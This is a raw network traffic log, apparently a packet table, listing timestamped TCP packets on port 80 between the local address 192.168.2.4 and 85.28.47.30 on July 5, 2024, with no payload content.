                                                                Jul 5, 2024 04:23:15.746346951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746392965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746392965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746419907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746431112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746442080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746450901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746457100 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746460915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746473074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746479988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746494055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746505022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746512890 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746516943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746540070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746551991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746659994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746682882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746695042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746702909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746711969 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746722937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746725082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746736050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746737957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746748924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746764898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746769905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746777058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746789932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746803045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.746803999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746823072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.746840000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.763072014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763122082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763133049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763144970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.763171911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.763242006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763253927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763264894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763276100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.763282061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.763314962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.764944077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.764991999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765021086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765038013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765058994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765070915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765144110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765156031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765166998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765177011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765185118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765197039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765224934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765244961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765259027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765286922 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765296936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765307903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765321016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765345097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765364885 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765384912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765397072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765407085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765425920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765439034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765522957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765532970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765572071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765608072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765644073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765646935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765680075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765820026 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765870094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.765893936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.765928030 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772314072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772322893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772327900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772337914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772350073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772373915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772392988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772404909 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772416115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772425890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772435904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772443056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772469044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772500992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772542000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772572041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772583008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772609949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772622108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772748947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772759914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772769928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772780895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772784948 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772794008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772798061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772808075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.772819042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772845030 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.772994995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773005962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773022890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773035049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773039103 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773047924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773055077 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773060083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773066998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773072958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773082018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773083925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773103952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773113012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773119926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773130894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773130894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773144007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773154020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773155928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773166895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773178101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773183107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773190022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773197889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773201942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773211956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773240089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773555994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773595095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773649931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773660898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773670912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773680925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773689985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773700953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773705006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773716927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773725986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773727894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773736954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773749113 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773753881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773777962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773791075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773833990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773845911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773854971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773865938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773875952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773876905 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773886919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773888111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773905993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773916006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773919106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773927927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773938894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.773941040 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773963928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.773986101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814728022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814790964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814811945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814825058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814848900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814862967 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814889908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814902067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814913034 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.814927101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814934969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.814956903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815079927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815090895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815100908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815112114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815125942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815135002 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815159082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815171003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815171957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815196991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815211058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815253973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815268040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815277100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.815291882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.815304041 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837404013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837414980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837428093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837462902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837474108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837482929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837498903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837507963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837554932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837567091 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837595940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837622881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837624073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837637901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837650061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837660074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837666988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837687969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837722063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837764025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837776899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837788105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837805033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837841034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837862968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837872982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837882996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837893963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837902069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837929964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.837946892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.837984085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.843473911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843485117 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843496084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843523026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.843538046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843549013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843550920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.843560934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843570948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.843575954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.843585968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.843607903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857541084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857619047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857626915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857637882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857661963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857686996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857714891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857727051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857736111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857748032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857754946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857784033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857811928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857902050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857913971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857923985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857934952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857942104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857959032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857980967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.857981920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.857991934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.858016968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.858028889 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.858057976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.858067989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.858095884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.858105898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859014988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859062910 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859086037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859097004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859113932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859124899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859128952 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859142065 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859150887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859179974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859204054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859214067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859225035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.859239101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.859256029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866038084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866050005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866070032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866080046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866091013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866087914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866101027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866106987 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866120100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866138935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866153955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866225004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866235971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866245985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866261005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866267920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866274118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866288900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866290092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866302013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866308928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866312981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866324902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866334915 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866343975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866347075 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866364002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866372108 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866375923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866384983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866388083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866396904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866400003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866410971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866410971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866425037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866431952 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866452932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866734982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866769075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866771936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866780996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866816044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866827965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866897106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866908073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866918087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866929054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:15.866935968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866946936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.866971970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:15.867062092 CEST804973285.28.47.30192.168.2.4
